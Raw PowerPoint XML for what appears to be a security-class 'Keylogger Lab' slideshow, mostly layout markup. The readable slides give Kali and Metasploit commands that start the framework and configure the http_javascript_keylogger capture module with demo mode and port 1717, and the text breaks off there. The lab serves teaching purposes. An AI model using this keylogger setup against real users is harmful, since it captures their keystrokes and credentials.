      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Guest User" userId="S::urn:spo:anon#79343940a8a7ea9fea1babe9da12adcf6897b8d58c49de73fff3f692d471f560::" providerId="AD" clId="Web-{A6499872-2070-82DB-B218-038354EE674D}" dt="2020-03-17T03:49:43.979" v="101" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2050871563" sldId="601"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Guest User" userId="S::urn:spo:anon#79343940a8a7ea9fea1babe9da12adcf6897b8d58c49de73fff3f692d471f560::" providerId="AD" clId="Web-{A6499872-2070-82DB-B218-038354EE674D}" dt="2020-03-17T03:49:43.979" v="101" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2050871563" sldId="601"/>
            <ac:spMk id="3" creationId="{3610F421-6420-42F0-B7F9-0937F8D1843A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1CC0369-5EB2-4A74-B757-22D4DBDAF47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1A9F40-A739-4262-B7E4-77D8A115798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C7948F-D0B8-4C0B-942E-7C815663835F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BF556B-939A-4E44-B191-A2648552079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E0DC8C-7EA1-4231-877B-A5C14CCA06B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970180-5D79-4430-8F42-C2E71B988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1054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8" name="Shape 12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6507661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192024" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="924">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr indent="96012" defTabSz="192024" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="924">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr indent="192024" defTabSz="192024" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="924">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr indent="288036" defTabSz="192024" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="924">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr indent="384048" defTabSz="192024" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="924">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr indent="480060" defTabSz="192024" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="924">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr indent="576072" defTabSz="192024" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="924">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr indent="672084" defTabSz="192024" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="924">
        <a:latin typeface="Helvetica Neue"/>
        <a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr indent="768096" defTabSz="192024" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="117999"/>
      </a:lnSpc>
      <a:defRPr sz="924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5189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6726063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787" y="4243845"/>
            <a:ext cx="2307831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6726064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6833787" y="2590078"/>
            <a:ext cx="2307832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0242" y="2733709"/>
            <a:ext cx="6069268" cy="1373070"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="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0241" y="4394040"/>
            <a:ext cx="6108101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55655" y="5936188"/>
            <a:ext cx="2057400" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4D7BBE52-833F-47BA-9381-F94C2C00145E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1" y="5936189"/>
            <a:ext cx="402166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399" y="2750337"/>
            <a:ext cx="1370293" cy="1356442"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A90CCEF0-5ED6-47CF-A471-6E95504D72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842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3" y="4711617"/>
            <a:ext cx="6894770" cy="544482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31639" y="609598"/>
            <a:ext cx="6896534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1" y="5256098"/>
            <a:ext cx="6894772" cy="54781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BFDB-6F2F-408A-B4B5-E14287D8A7A4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11310"/>
            <a:ext cx="1149836" cy="1090789"/>
          </a:xfrm>
        </p:spPr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2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2" name="Picture 21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3" name="Picture 22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4" name="Rectangle 23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255" y="609597"/>
            <a:ext cx="6896534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4710340"/>
            <a:ext cx="6889151" cy="1101764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BFDB-6F2F-408A-B4B5-E14287D8A7A4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11616"/>
            <a:ext cx="1149836" cy="1090789"/>
          </a:xfrm>
        </p:spPr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2431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30" name="Picture 29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1" name="Picture 30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2" name="Rectangle 31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921" y="616983"/>
            <a:ext cx="642514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89438" y="3660763"/>
            <a:ext cx="5987731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4710340"/>
            <a:ext cx="6903919" cy="110176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BFDB-6F2F-408A-B4B5-E14287D8A7A4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09926"/>
            <a:ext cx="1149836" cy="1090789"/>
          </a:xfrm>
        </p:spPr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270932" y="748116"/>
            <a:ext cx="5334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967191" y="2998573"/>
            <a:ext cx="457200" cy="5847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824608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3" name="Picture 22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4" name="Picture 23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5" name="Rectangle 24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8" y="4710340"/>
            <a:ext cx="6896534" cy="5898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9" y="5300150"/>
            <a:ext cx="6896534" cy="51195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BFDB-6F2F-408A-B4B5-E14287D8A7A4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09926"/>
            <a:ext cx="1149836" cy="1090789"/>
          </a:xfrm>
        </p:spPr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6414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32629" y="2329489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39777" y="3015290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78413" y="2336873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2879710" y="3007906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226136" y="2336873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233520" y="3007905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BFDB-6F2F-408A-B4B5-E14287D8A7A4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610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35" name="Picture 34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6" name="Picture 35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7" name="Rectangle 36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37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32391" y="4297503"/>
            <a:ext cx="21922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32391" y="2336873"/>
            <a:ext cx="2192257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32391" y="4873765"/>
            <a:ext cx="219225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70497" y="4297503"/>
            <a:ext cx="221507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870497" y="2336873"/>
            <a:ext cx="221507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2869483" y="4873764"/>
            <a:ext cx="2218004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231028" y="4297503"/>
            <a:ext cx="219433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231027" y="2336873"/>
            <a:ext cx="2194333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230934" y="4873762"/>
            <a:ext cx="2197239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BFDB-6F2F-408A-B4B5-E14287D8A7A4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3759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7" name="Picture 16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8" name="Picture 17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9" name="Rectangle 18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BBE52-833F-47BA-9381-F94C2C00145E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CCEF0-5ED6-47CF-A471-6E95504D72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8083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 rot="5400000">
            <a:off x="4575305" y="2747178"/>
            <a:ext cx="6862555" cy="1368199"/>
            <a:chOff x="2281445" y="609600"/>
            <a:chExt cx="6862555" cy="1368199"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rectangle 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm>
              <a:off x="2281445" y="609601"/>
              <a:ext cx="5285695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7710769" y="609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64798" y="609597"/>
            <a:ext cx="1069602" cy="446193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241" y="609598"/>
            <a:ext cx="6576359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29144" y="5936188"/>
            <a:ext cx="2057400" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4D7BBE52-833F-47BA-9381-F94C2C00145E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0241" y="5936189"/>
            <a:ext cx="451895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31152" y="5432500"/>
            <a:ext cx="1149636" cy="1273100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{A90CCEF0-5ED6-47CF-A471-6E95504D72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1564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727762" y="4397878"/>
            <a:ext cx="3230218" cy="2048446"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="2250" b="0" baseline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28618" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1876"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="857237" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1688"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1285854" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1500"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1714473" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1500"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2143092" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1500"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2571711" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1500"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3000328" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1500"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3428947" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1500"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presenter name,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Job Title</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Email</a:t>
            </a:r>
          </a:p>
          <a:p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39558049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25558" y="4737655"/>
            <a:ext cx="4617541" cy="1547191"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1800" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT" panose="020B0602020104020603" pitchFamily="34" charset="0"/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/>
              <a:t>Presenter name, email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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3577479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8" name="Picture 2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9" name="Picture 2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0" name="Rectangle 2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3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BBE52-833F-47BA-9381-F94C2C00145E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CCEF0-5ED6-47CF-A471-6E95504D72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627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2728432"/>
            <a:ext cx="9161969" cy="1677035"/>
            <a:chOff x="0" y="2895600"/>
            <a:chExt cx="9161969" cy="1677035"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="Picture 1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0" name="Picture 19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1" name="Rectangle 20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2869895"/>
            <a:ext cx="688915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1639" y="4232172"/>
            <a:ext cx="688915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65810" y="5936188"/>
            <a:ext cx="2057400" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4D7BBE52-833F-47BA-9381-F94C2C00145E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0" y="5936189"/>
            <a:ext cx="483467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56438" y="2869896"/>
            <a:ext cx="1149836" cy="1090789"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A90CCEF0-5ED6-47CF-A471-6E95504D72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082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53228"/>
            <a:ext cx="688739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2336873"/>
            <a:ext cx="3357899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61128" y="2336873"/>
            <a:ext cx="3359661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BBE52-833F-47BA-9381-F94C2C00145E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CCEF0-5ED6-47CF-A471-6E95504D72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408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9" name="Picture 2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0" name="Picture 29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1" name="Rectangle 30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3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30"/>
            <a:ext cx="6896534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0988" y="2336874"/>
            <a:ext cx="3145080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638" y="3030009"/>
            <a:ext cx="336704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82646" y="2336873"/>
            <a:ext cx="3145527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061129" y="3030009"/>
            <a:ext cx="3367044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BBE52-833F-47BA-9381-F94C2C00145E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CCEF0-5ED6-47CF-A471-6E95504D72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46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6" name="Picture 15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7" name="Picture 16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BBE52-833F-47BA-9381-F94C2C00145E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CCEF0-5ED6-47CF-A471-6E95504D72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745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HD-ShadowShort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871"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7717217" y="1973262"/>
            <a:ext cx="1444752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710769" y="609600"/>
            <a:ext cx="1433231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BBE52-833F-47BA-9381-F94C2C00145E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CCEF0-5ED6-47CF-A471-6E95504D72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89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7"/>
            <a:ext cx="6896534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4385" y="2336874"/>
            <a:ext cx="3913788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1" y="2336873"/>
            <a:ext cx="2796240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BBE52-833F-47BA-9381-F94C2C00145E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CCEF0-5ED6-47CF-A471-6E95504D72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588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10956" y="2336874"/>
            <a:ext cx="3917217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2336874"/>
            <a:ext cx="2798487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BBE52-833F-47BA-9381-F94C2C00145E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CCEF0-5ED6-47CF-A471-6E95504D72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738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ames\Desktop\msft\Berlin\build Assets\hashOverlaySD-FullResolve.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId21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580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2336873"/>
            <a:ext cx="6887389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67881" y="5936188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6CBFDB-6F2F-408A-B4B5-E14287D8A7A4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5936189"/>
            <a:ext cx="48346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48600" y="753228"/>
            <a:ext cx="1157674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1112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  <p:sldLayoutId id="2147483717" r:id="rId13"/>
    <p:sldLayoutId id="2147483718" r:id="rId14"/>
    <p:sldLayoutId id="2147483719" r:id="rId15"/>
    <p:sldLayoutId id="2147483720" r:id="rId16"/>
    <p:sldLayoutId id="2147483721" r:id="rId17"/>
    <p:sldLayoutId id="2147483722" r:id="rId18"/>
    <p:sldLayoutId id="2147483676" r:id="rId1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096209C-7800-43B4-A3FD-A567195D85E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532661" y="2443420"/>
            <a:ext cx="699988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/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Circe Light" panose="020B0402020203020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Keylogger Lab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F3E90-FDE5-43CB-B57A-50251D286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Initialize Metasploit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1EC8F2-047F-462B-BD45-4A942779A0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99921"/>
            <a:ext cx="8286750" cy="3072130"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the Kali environment, open Terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter the following command to start the PostgreSQL database:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter the following command to start the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> framework:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Courier" panose="020604090202050204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D2746B-BBE4-4EC9-91E5-48892FEEE1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9230" y="510893"/>
            <a:ext cx="3156170" cy="1284412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="5400000" sx="103000" sy="103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399102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60854-C984-4173-AF32-C3E403ED3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Initialize Metasploit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6D9FD9-9EEE-4872-82A7-63A6EE8CC0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2136"/>
            <a:ext cx="8286750" cy="934166"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start Metasploit with the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Courier" panose="020604090202050204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2A513D-44E8-4D4B-8894-34B80E5ECB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3334" y="2563289"/>
            <a:ext cx="4741741" cy="1134575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8EEAB6B-7144-4D8E-AA86-0C0C09153F16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="2626302"/>
            <a:ext cx="3704359" cy="2143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19050" tIns="19050" rIns="19050" bIns="19050" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="577850" marR="0" indent="-577850" algn="l" defTabSz="825500" latinLnBrk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25000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst/>
              <a:defRPr sz="6400" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Tw Cen MT" panose="020B0602020104020603" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tw Cen MT" panose="020B0602020104020603" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="1270000" marR="0" indent="0" algn="l" defTabSz="825500" latinLnBrk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25000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst/>
              <a:defRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Tw Cen MT" panose="020B0602020104020603" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tw Cen MT" panose="020B0602020104020603" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1905000" marR="0" indent="0" algn="l" defTabSz="825500" latinLnBrk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25000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§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Tw Cen MT" panose="020B0602020104020603" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tw Cen MT" panose="020B0602020104020603" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2540000" marR="0" indent="0" algn="l" defTabSz="825500" latinLnBrk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25000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst/>
              <a:defRPr sz="4000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Tw Cen MT" panose="020B0602020104020603" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tw Cen MT" panose="020B0602020104020603" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="3175000" marR="0" indent="0" algn="l" defTabSz="825500" latinLnBrk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25000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst/>
              <a:defRPr sz="4000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Tw Cen MT" panose="020B0602020104020603" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tw Cen MT" panose="020B0602020104020603" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3810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4445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5080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5715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hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>You should notice that Metasploit console has started and you should now see:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> &gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39714213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F7508-1B8C-4674-A7EF-A074E249F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Start the Keylogger Attack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F30718-BBC5-40D2-A86C-9330C9A95C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8"/>
            <a:ext cx="8373110" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tell Metasploit to use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Keylogger attack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>use auxiliary/server/capture/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http_javascript_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look at the options for this attack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>show options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DEA523-D9EE-4BA1-AB9F-E178EDEF57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2545" y="3237115"/>
            <a:ext cx="4649115" cy="2046111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="5400000" sx="102000" sy="102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448123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A53DE-0B40-4711-8077-2B93D2A62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Start the Keylogger Attack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0F421-6420-42F0-B7F9-0937F8D184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Turn the keylogger demo on:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>set demo True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Set the keylogger server port to port 1717:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>set SRVPORT 1717</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier"/>
